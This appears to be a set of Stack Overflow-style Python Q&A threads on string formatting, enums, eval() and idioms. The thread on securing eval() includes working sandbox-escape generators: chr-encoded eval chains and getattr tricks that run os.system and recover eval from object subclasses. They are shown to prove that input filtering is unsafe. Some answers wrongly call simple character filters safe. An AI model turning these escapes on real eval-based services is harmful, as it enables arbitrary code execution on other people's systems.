Best practice for string substitution with gettext using Python - python

Looking for best practice advice on what string substitution technique to use when using gettext(). Or do all techniques apply equally?
I can think of at least 3 string techniques:
1) Classic "%" based formatting:
"My name is %(name)s" % locals()
2) .format() based formatting:
"My name is {name}".format( locals() )
3) string.Template.safe_substitute()
import string
template = string.Template( "My name is ${name}" )
template.safe_substitute( locals() )
The advantage of the string.Template technique is that a translated string with with an incorrectly spelled variable reference can still yield a usable string value while the other techniques unconditionally raise an exception. The downside of the string.Template technique appears to be the inability for one to customize how a variable is formatted (padding, justification, width, etc).

Actually I would prefer to get an exception during my tests, to fix the error as soon as possible -- "errors should not pass silently". So I consider that approach (2) is the best one in modern Python (which supports the readable and flexible format), and approach (1) a probably inevitable fall-back if you're stuck supporting older Python releases (where % was "the" way to do flexible formatting -- finding, or coding, some backport of format would be the main alternative).

Don't have incorrectly spelled variable names - that's what testing is for.
On the face of it, displaying something seems better than throwing an exception, but sooner or later one of those mistranslations is bound to cause offence to some user.
.format() is the way to go these days.
Reconsider passing locals() straight into the translation. It will save you worrying about what happens if someone works out a way to do something sneaky with self in one of the translations.

Related

Enum vs String as a parameter in a function

I noticed that many libraries nowadays seem to prefer the use of strings over enum-type variables for parameters.
Where people would previously use enums, e.g. dateutil.rrule.FR for a Friday, it seems that this has shifted towards using string (e.g. 'FRI').
Same in numpy (or pandas for that matter), where searchsorted for example uses of strings (e.g. side='left', or side='right') rather than a defined enum. For the avoidance of doubt, before python 3.4 this could have been easily implemented as an enum as such:
class SIDE:
RIGHT = 0
LEFT = 1
And the advantages of enums-type variable are clear: You can't misspell them without raising an error, they offer proper support for IDEs, etc.
So why use strings at all, instead of sticking to enum types? Doesn't this make the programs much more prone to user errors? It's not like enums create an overhead - if anything they should be slightly more efficient. So when and why did this paradigm shift happen?
I think enums are safer especially for larger systems with multiple developers.
As soon as the need arises to change the value of such an enum, looking up and replacing a string in many places is not my idea of fun :-)
The most important criteria IMHO is the usage: for use in a module or even a package a string seems to be fine, in a public API I'ld prefer enums.
[update]
As of today (2019) Python introduced dataclasses - combined with optional type annotations and static type analyzers like mypy I think this is a solved problem.
As for efficiency, attribute lookup is somewhat expensive in Python compared to most computer languages so I guess some libraries may still chose to avoid it for performance reasons.
[original answer]
IMHO it is a matter of taste. Some people like this style:
def searchsorted(a, v, side='left', sorter=None):
...
assert side in ('left', 'right'), "Invalid side '{}'".format(side)
...
numpy.searchsorted(a, v, side='right')
Yes, if you call searchsorted with side='foo' you may get an AssertionError way later at runtime - but at least the bug will be pretty easy to spot looking the traceback.
While other people may prefer (for the advantages you highlighted):
numpy.searchsorted(a, v, side=numpy.CONSTANTS.SIDE.RIGHT)
I favor the first because I think seldom used constants are not worth the namespace cruft. You may disagree, and people may align with either side due to other concerns.
If you really care, nothing prevents you from defining your own "enums":
class SIDE(object):
RIGHT = 'right'
LEFT = 'left'
numpy.searchsorted(a, v, side=SIDE.RIGHT)
I think it is not worth but again it is a matter of taste.
[update]
Stefan made a fair point:
As soon as the need arises to change the value of such an enum, looking up and replacing a string in many places is not my idea of fun :-)
I can see how painful this can be in a language without named parameters - using the example you have to search for the string 'right' and get a lot of false positives. In Python you can narrow it down searching for side='right'.
Of course if you are dealing with an interface that already has a defined set of enums/constants (like an external C library) then yes, by all means mimic the existing conventions.
I understand this question has already been answered, but there is one thing that has not at all been addressed: the fact that Python Enum objects must be explicitly called for their value when using values stored by Enums.
>>> class Test(Enum):
... WORD='word'
... ANOTHER='another'
...
>>> str(Test.WORD.value)
'word'
>>> str(Test.WORD)
'Test.WORD'
One simple solution to this problem is to offer an implementation of __str__()
>>> class Test(Enum):
... WORD='word'
... ANOTHER='another'
... def __str__(self):
... return self.value
...
>>> Test.WORD
<Test.WORD: 'word'>
>>> str(Test.WORD)
'word'
Yes, adding .value is not a huge deal, but it is an inconvenience nonetheless. Using regular strings requires zero extra effort, no extra classes, or redefinition of any default class methods. Still, there must be explicit casting to a string value in many cases, where a simple str would not have a problem.
i prefer strings for the reason of debugging. compare an object like
side=1, opt_type=0, order_type=6
to
side='BUY', opt_type='PUT', order_type='FILL_OR_KILL'
i also like "enums" where the values are strings:
class Side(object):
BUY = 'BUY'
SELL = 'SELL'
SHORT = 'SHORT'
Strictly speaking Python does not have enums - or at least it didn't prior to v3.4
https://docs.python.org/3/library/enum.html
I prefer to think of your example as programmer defined constants.
In argparse, one set of constants have string values. While the code uses the constant names, users more often use the strings.
e.g. argparse.ZERO_OR_MORE = '*'
arg.parse.OPTIONAL = '?'
numpy is one of the older 3rd party packages (at least its roots like numeric are). String values are more common than enums. In fact I can't off hand think of any enums (as you define them).

Convert a string equation to an integer answer

If I have a string
equation = "1+2+3+4"
How do I change it into an int and equate the answer? I was thinking something like this but it would give an error.
answer = (int)equation
print(answer)
The equation could contain +-*/
If you are prepared to accept the risks, namely that you may be letting hostile users run whatever they like on your machine, you could use eval():
>>> equation = "1+2+3+4"
>>> eval(equation)
10
If your code will only ever accept input that you control, then this is the quickest and simplest solution. If you need to allow general input from users other than you, then you'd need to look for a more restrictive expression evaluator.
Update
Thanks to #roippi for pulling me up and pointing out that the code above executes in the environment of the calling code. So the expression would be evaluated with local and global variables available. Suppress that like so:
eval(equation, {'__builtins__': None})
This doesn't make the use of eval() secure. It just gives it a clean, empty environment in which to operate. A hostile user could still hose your system.
If we wanted to expose a calculator to the world, I'd be very interested to see if a cracker could work around this:
import string
def less_dangerous_eval(equation):
if not set(equation).intersection(string.ascii_letters + '{}[]_;\n'):
return eval(equation)
else:
print("illegal character")
return None
less_dangerous_eval('1*2/3^4+(5-6)')
returns:
3
I know that this can be broken by giving it bad syntax (fixable with a try/except block) or an operation that would take up all of the memory in the system (try/except catching this might be more iffy), but I am not currently aware of any way for someone to gain control.
This works if you only have digits and plusses:
answer = sum(float(i) for i in equation.split('+'))
or if you know they will only be integers
answer = sum(int(i) for i in equation.split('+'))
If you want to be able to evaluate more than that, I suggest you do your homework:
Look up the string module (which has string.digits)
the math module, which has your operations
create logic to perform the operations in proper order
Good luck!
I suggest you use eval and check the input:
def evaluate(s):
import string
for i in s:
if i not in "+-*/ " + string.digits:
return False # input is not valid
return eval(s)
As already mentioned, eval is unsafe, and very difficult to make safe. I remember seeing a very good blog post explaining this, does anyone know what it was? However ast.literal_eval is safe, it doesn't allow __import__ etc. I would strongly recomment using ast.literal_eval instead of eval whenever possible. Unfortunately, in this case it isn't possible. However, in a different case, e.g. one where you only need to support addition and multiplication, you could (and should) use literal_eval instead.
On the other hand, if this is homework with the intention for you to learn about parsing, then I would suggest doing this a different way. I know that if I was a teacher, I would respond to an answer using eval with "Very clever, but this won't help you pass a test on abstract syntax trees." (which are incidentally one thing that you should look at if you want to implement this "properly").

PEP8, locals() and interpolation

Here is some code:
foo = "Bears"
"Lions, Tigers and %(foo)s" % locals()
My PEP8 linter (SublimeLinter) complains about this, because foo is "unreferenced". My question is whether PEP8 should count this type of string interpolation as "referenced", or if there is a good reason to consider this "bad style".
Well, it isn't referenced. The part that's questionable style is using locals() to access variables instead of just accessing them by name. See this previous question for why that's a dubious idea. It's not a terrible thing, but it's not good style for a program that you want to maintain in the long term.
Edit: It's true that when you use a literal format string, it seems more explicit. But part of the point of the previous post is that in a larger program, you will probably wind up not using a literal format string. If it's a small program and you don't care, go ahead and use it. But warning about things that are likely to cause maintainability problems later is also part of what style guides and linters are for.
Also, locals isn't a canonical representation of names that are explicitly referenced in the literal. It's a canonical representation of all names in the local namespace. You can still do it if you like, but it's basically a loose/sloppy alternative to explicitly using the names you're using, which is again, exactly the sort of thing linters are supposed to warn you about.
Even if you reject BrenBarn's argument that foo isn't referenced, if you accept the argument that passing locals() in string formatting should be flagged, it may not be worth writing to code to consider foo referenced.
First, in every case where that extra code would help, the construct is not acceptable anyway, and the user is going to have to ignore a lint warning anyway. Yes, there is some harm in giving the user two lint warnings to ignore when there's only actually one problem, especially if one of the warnings is somewhat misleading. But is it enough harm to justify writing very complicated code and introduce new bugs into the linter?
You also have to consider that for this to actually work, the linter has to recognize not just % formatting, but also {} formatting, and every other kind of string formatting, HTML templating, etc. that the user could be using. In practice, this means handling various very common forms, and providing some kind of hook for the user to describe anything else.
And, on top of that, even if you don't think it should work with arbitrarily-generated format strings, it surely has to at least work with l10n. How is that going to work? If the format string is generated by something like gettext, the linter has no way of knowing whether foo is referenced, unless it can check all of the translations and see that at least one of them references foo—which means it has to understand (or have hooks to be taught) every string translation mechanism, and have access to the translation database.
So, I would suggest that, even if you consider the warning spurious in this case, you leave it there anyway. At most, add something which qualifies the warning:
foo is possibly unreferenced, but in a function that uses locals()
The following wouldn't make SublimeLinter happy either, It looks up each variable name referenced in the string and substitutes the corresponding value from the namespace mapping, which defaults to the caller's locals. As such it show the inherent limitation a utility like SublimeLinter has when trying to determine if something has been referenced in Python). My advice is just ignore SublimeLinter or add code to fake it out, like foo = foo. I've had to do something like the latter to get rid of C compiler warnings about things which were both legal and intended.
import re
import sys
SUB_RE = re.compile(r"%\((.*?)\)s")
def local_vars_subst(s, namespace=None):
if namespace is None:
namespace = sys._getframe(1).f_locals
def repl(matchobj):
var = matchobj.group(1).strip()
try:
retval = namespace[var]
except KeyError:
retval = "<undefined>"
return retval
return SUB_RE.sub(repl, s)
foo = "Bears"
print local_vars_subst("Lions, Tigers and %(foo)s")

Is there a way to secure strings for Python's eval?

There are many questions on SO about using Python's eval on insecure strings (eg.: Security of Python's eval() on untrusted strings?, Python: make eval safe). The unanimous answer is that this is a bad idea.
However, I found little information on which strings can be considered safe (if any).
Now I'm wondering if there is a definition of "safe strings" available (eg.: a string that only contains lower case ascii chars or any of the signs +-*/()). The exploits I found generally relied on either of _.,:[]'" or the like. Can such an approach be secure (for use in a graph painting web application)?
Otherwise, I guess using a parsing package as Alex Martelli suggested is the only way.
EDIT:
Unfortunately, there are neither answers that give a compelling explanation for why/ how the above strings are to be considered insecure (a tiny working exploit) nor explanations for the contrary. I am aware that using eval should be avoided, but that's not the question. Hence, I'll award a bounty to the first who comes up with either a working exploit or a really good explanation why a string mangled as described above is to be considered (in)secure.
Here you have a working "exploit" with your restrictions in place - only contains lower case ascii chars or any of the signs +-*/() .
It relies on a 2nd eval layer.
def mask_code( python_code ):
s="+".join(["chr("+str(ord(i))+")" for i in python_code])
return "eval("+s+")"
bad_code='''__import__("os").getcwd()'''
masked= mask_code( bad_code )
print masked
print eval(bad_code)
output:
eval(chr(111)+chr(115)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
/home/user
This is a very trivial "exploit". I'm sure there's countless others, even with further character restrictions.
It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.
No, there isn't, or at least, not a sensible, truly secure way. Python is a highly dynamic language, and the flipside of that is that it's very easy to subvert any attempt to lock the language down.
You either need to write your own parser for the subset you want, or use something existing, like ast.literal_eval(), for particular cases as you come across them. Use a tool designed for the job at hand, rather than trying to force an existing one to do the job you want, badly.
Edit:
An example of two strings, that, while fitting your description, if eval()ed in order, would execute arbitrary code (this particular example running evil.__method__().
"from binascii import *"
"eval(unhexlify('6576696c2e5f5f6d6574686f645f5f2829'))"
An exploit similar to goncalopp's but that also satisfy the restriction that the string 'eval' is not a substring of the exploit:
def to_chrs(text):
return '+'.join('chr(%d)' % ord(c) for c in text)
def _make_getattr_call(obj, attr):
return 'getattr(*(list(%s for a in chr(1)) + list(%s for a in chr(1))))' % (obj, attr)
def make_exploit(code):
get = to_chrs('get')
builtins = to_chrs('__builtins__')
eval = to_chrs('eval')
code = to_chrs(code)
return (_make_getattr_call(
_make_getattr_call('globals()', '{get}') + '({builtins})',
'{eval}') + '({code})').format(**locals())
It uses a combination of genexp and tuple unpacking to call getattr with two arguments without using the comma.
An example usage:
>>> exploit = make_exploit('__import__("os").system("echo $PWD")')
>>> print exploit
getattr(*(list(getattr(*(list(globals() for a in chr(1)) + list(chr(103)+chr(101)+chr(116) for a in chr(1))))(chr(95)+chr(95)+chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)+chr(95)+chr(95)) for a in chr(1)) + list(chr(101)+chr(118)+chr(97)+chr(108) for a in chr(1))))(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(34)+chr(101)+chr(99)+chr(104)+chr(111)+chr(32)+chr(36)+chr(80)+chr(87)+chr(68)+chr(34)+chr(41))
>>> eval(exploit)
/home/giacomo
0
This proves that to define restrictions only on the text that make the code safe is really hard. Even things like 'eval' in code are not safe. Either you must remove the possibility of executing a function call at all, or you must remove all dangerous built-ins from eval's environment. My exploit also shows that getattr is as bad as eval even when you can not use the comma, since it allows you to walk arbitrary into the object hierarchy. For example you can obtain the real eval function even if the environment does not provide it:
def real_eval():
get_subclasses = _make_getattr_call(
_make_getattr_call(
_make_getattr_call('()',
to_chrs('__class__')),
to_chrs('__base__')),
to_chrs('__subclasses__')) + '()'
catch_warnings = 'next(c for c in %s if %s == %s)()' % (get_subclasses,
_make_getattr_call('c',
to_chrs('__name__')),
to_chrs('catch_warnings'))
return _make_getattr_call(
_make_getattr_call(
_make_getattr_call(catch_warnings, to_chrs('_module')),
to_chrs('__builtins__')),
to_chrs('get')) + '(%s)' % to_chrs('eval')
>>> no_eval = __builtins__.__dict__.copy()
>>> del no_eval['eval']
>>> eval(real_eval(), {'__builtins__': no_eval})
<built-in function eval>
Even though if you remove all the built-ins, then the code becomes safe:
>>> eval(real_eval(), {'__builtins__': None})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name 'getattr' is not defined
Note that setting '__builtins__' to None removes also chr, list, tuple etc.
The combo of your character restrinctions and '__builtins__' to None is completely safe, because the user has no way to access anything. He can't use the ., the brackets [] or any built-in function or type.
Even though I must say in this way what you can evaluate is pretty limited. You can't do much more than do operations on numbers.
Probably it's enough to remove eval, getattr, and chr from the built-ins to make the code safe, at least I can't think of a way to write an exploit that does not use one of them.
A "parsing" approach is probably safer and gives more flexibility. For example this recipe is pretty good and is also easily customizable to add more restrictions.
To study how to make safe eval I suggest RestrictedPython module (over 10 years of production usage, one fine piece of Python software)
http://pypi.python.org/pypi/RestrictedPython
RestrictedPython takes Python source code and modifies its AST (Abstract Syntax Tree) to make the evaluation safe within the sandbox, without leaking any Python internals which might allow to escape the sandbox.
From RestrictedPython source code you'll learn what kind of tricks are needed to perform to make Python sandboxed safe.
You probably should avoid eval, actually.
But if your stuck with it, you could just make sure your strings are alphanumeric. That should be safe.
Assuming the named functions exist and are safe:
if re.match("^(?:safe|soft|cotton|ball|[()])+$", code): eval(code)
It's not enough to create input sanitization routines. You must also ensure that sanitization is not once accidentally omitted. One way to do that is taint checking.

What are the important language features (idioms) of Python to learn early on [duplicate]

This question already has answers here:
The Zen of Python [closed]
(22 answers)
Python: Am I missing something? [closed]
(16 answers)
Closed 8 years ago.
I would be interested in knowing what the StackOverflow community thinks are the important language features (idioms) of Python. Features that would define a programmer as Pythonic.
Python (pythonic) idiom - "code expression" that is natural or characteristic to the language Python.
Plus, Which idioms should all Python programmers learn early on?
Thanks in advance
Related:
Code Like a Pythonista: Idiomatic Python
Python: Am I missing something?
Python is a language that can be described as:
"rules you can fit in the
palm of your hand with a huge bag of
hooks".
Nearly everything in python follows the same simple standards. Everything is accessible, changeable, and tweakable. There are very few language level elements.
Take for example, the len(data) builtin function. len(data) works by simply checking for a data.__len__() method, and then calls it and returns the value. That way, len() can work on any object that implements a __len__() method.
Start by learning about the types and basic syntax:
Dynamic Strongly Typed Languages
bool, int, float, string, list, tuple, dict, set
statements, indenting, "everything is an object"
basic function definitions
Then move on to learning about how python works:
imports and modules (really simple)
the python path (sys.path)
the dir() function
__builtins__
Once you have an understanding of how to fit pieces together, go back and cover some of the more advanced language features:
iterators
overrides like __len__ (there are tons of these)
list comprehensions and generators
classes and objects (again, really simple once you know a couple rules)
python inheritance rules
And once you have a comfort level with these items (with a focus on what makes them pythonic), look at more specific items:
Threading in python (note the Global Interpreter Lock)
context managers
database access
file IO
sockets
etc...
And never forget The Zen of Python (by Tim Peters)
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
This page covers all the major python idioms: http://python.net/~goodger/projects/pycon/2007/idiomatic/handout.html
An important idiom in Python is docstrings.
Every object has a __doc__ attribute that can be used to get help on that object. You can set the __doc__ attribute on modules, classes, methods, and functions like this:
# this is m.py
""" module docstring """
class c:
"""class docstring"""
def m(self):
"""method docstring"""
pass
def f(a):
"""function f docstring"""
return
Now, when you type help(m), help(m.f) etc. it will print the docstring as a help message.
Because it's just part of normal object introspection this can be used by documention generating systems like epydoc or used for testing purposes by unittest.
It can also be put to more unconventional (i.e. non-idiomatic) uses such as grammars in Dparser.
Where it gets even more interesting to me is that, even though doc is a read-only attribute on most objects, you can use them anywhere like this:
x = 5
""" pseudo docstring for x """
and documentation tools like epydoc can pick them up and format them properly (as opposed to a normal comment which stays inside the code formatting.
Decorators get my vote. Where else can you write something like:
def trace(num_args=0):
def wrapper(func):
def new_f(*a,**k):
print_args = ''
if num_args > 0:
print_args = str.join(',', [str(x) for x in a[0:num_args]])
print('entering %s(%s)' %(f.__name__,print_args))
rc = f(*a,**k)
if rc is not None:
print('exiting %s(%s)=%s' %(f.__name__,str(rc)))
else:
print('exiting %s(%s)' %(f.__name__))
return rc
return new_f
return wrapper
#trace(1)
def factorial(n):
if n < 2:
return 1
return n * factorial(n-1)
factorial(5)
and get output like:
entering factorial(5)
entering factorial(4)
entering factorial(3)
entering factorial(2)
entering factorial(1)
entering factorial(0)
exiting factorial(0)=1
exiting factorial(1)=1
exiting factorial(2)=2
exiting factorial(3)=6
exiting factorial(4)=24
exiting factorial(5)=120
Everything connected to list usage.
Comprehensions, generators, etc.
Personally, I really like Python syntax defining code blocks by using indentation, and not by the words "BEGIN" and "END" (as in Microsoft's Basic and Visual Basic - I don't like these) or by using left- and right-braces (as in C, C++, Java, Perl - I like these).
This really surprised me because, although indentation has always been very important to me, I didn't make to much "noise" about it - I lived with it, and it is considered a skill to be able to read other peoples, "spaghetti" code. Furthermore, I never heard another programmer suggest making indentation a part of a language. Until Python! I only wish I had realized this idea first.
To me, it is as if Python's syntax forces you to write good, readable code.
Okay, I'll get off my soap-box. ;-)
From a more advanced viewpoint, understanding how dictionaries are used internally by Python. Classes, functions, modules, references are all just properties on a dictionary. Once this is understood it's easy to understand how to monkey patch and use the powerful __gettattr__, __setattr__, and __call__ methods.
Here's one that can help. What's the difference between:
[ foo(x) for x in range(0, 5) ][0]
and
( foo(x) for x in range(0, 5) ).next()
answer:
in the second example, foo is called only once. This may be important if foo has a side effect, or if the iterable being used to construct the list is large.
Two things that struck me as especially Pythonic were dynamic typing and the various flavors of lists used in Python, particularly tuples.
Python's list obsession could be said to be LISP-y, but it's got its own unique flavor. A line like:
return HandEvaluator.StraightFlush, (PokerCard.longFaces[index + 4],
PokerCard.longSuits[flushSuit]), []
or even
return False, False, False
just looks like Python and nothing else. (Technically, you'd see the latter in Lua as well, but Lua is pretty Pythonic in general.)
Using string substitutions:
name = "Joe"
age = 12
print "My name is %s, I am %s" % (name, age)
When I'm not programming in python, that simple use is what I miss most.
Another thing you cannot start early enough is probably testing. Here especially doctests are a great way of testing your code by explaining it at the same time.
doctests are simple text file containing an interactive interpreter session plus text like this:
Let's instantiate our class::
>>> a=Something(text="yes")
>>> a.text
yes
Now call this method and check the results::
>>> a.canify()
>>> a.text
yes, I can
If e.g. a.text returns something different the test will fail.
doctests can be inside docstrings or standalone textfiles and are executed by using the doctests module. Of course the more known unit tests are also available.
I think that tutorials online and books only talk about doing things, not doing things in the best way. Along with the python syntax i think that speed in some cases is important.
Python provides a way to benchmark functions, actually two!!
One way is to use the profile module, like so:
import profile
def foo(x, y, z):
return x**y % z # Just an example.
profile.run('foo(5, 6, 3)')
Another way to do this is to use the timeit module, like this:
import timeit
def foo(x, y, z):
return x**y % z # Can also be 'pow(x, y, z)' which is way faster.
timeit.timeit('foo(5, 6, 3)', 'from __main__ import *', number = 100)
# timeit.timeit(testcode, setupcode, number = number_of_iterations)

Categories